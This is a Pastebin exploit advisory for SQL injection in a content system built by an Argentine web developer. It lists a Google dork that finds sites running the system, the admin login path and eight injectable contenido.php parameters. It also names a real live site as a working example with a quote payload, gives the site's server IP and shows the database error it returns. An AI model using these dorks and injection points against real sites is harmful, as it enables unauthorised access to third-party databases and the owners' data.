Advertisement
KingSkrupellos

Desarrollado por Creator Solution Argentina SQL Injection

Jan 16th, 2019
231
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.05 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : Desarrollado por Creator Solution Argentina SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 16/01/2019
  7. # Vendor Homepage : creators.com.ar
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Google Dorks : intext:''Desarrollado por: Creator Solution" site:ar
  12. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  13. Special Elements used in an SQL Command ('SQL Injection') ]
  14.  
  15. ####################################################################
  16.  
  17. # Admin Panel Login Path :
  18. ************************
  19.  
  20. /login.php
  21.  
  22. # SQL Injection Exploit :
  23. ***********************
  24.  
  25. /contenido.php?tablanom=noticias&indice=IdNoticia&id=[SQL Injection]
  26.  
  27. /contenido.php?tablanom=estatutos&indice=[SQL Injection]
  28.  
  29. /contenido.php?tablanom=popular&indice=idpopular&id=[SQL Injection]
  30.  
  31. /contenido.php?tablanom=historia&indice=[SQL Injection]
  32.  
  33. /contenido.php?tablanom=documentos&indice=[SQL Injection]
  34.  
  35. /contenido.php?tablanom=calendario&indice=[SQL Injection]
  36.  
  37. /contenido.php?tablanom=resultados&indice=[SQL Injection]
  38.  
  39. /contenido.php?tablanom=reglamentos&indice=[SQL Injection]
  40.  
  41. ####################################################################
  42.  
  43. # Example Vulnerable Site :
  44. *************************
  45.  
  46. [+] clubnauticocordoba.com.ar/contenido.php?tablanom=noticias&indice=IdNoticia&id=1'
  47.  
  48. [ Proof of Concept ] => archive.is/plkpL
  49.  
  50. Note : (72.29.77.172) => There are 489 domains hosted on this server.
  51.  
  52. ####################################################################
  53.  
  54. # SQL Database Error :
  55. **********************
  56.  
  57. You have an error in your SQL syntax; check the manual that
  58. corresponds to your MariaDB server version for the right syntax to use near '' DESC' at line 1
  59.  
  60. ####################################################################
  61.  
  62. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  63.  
  64. ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement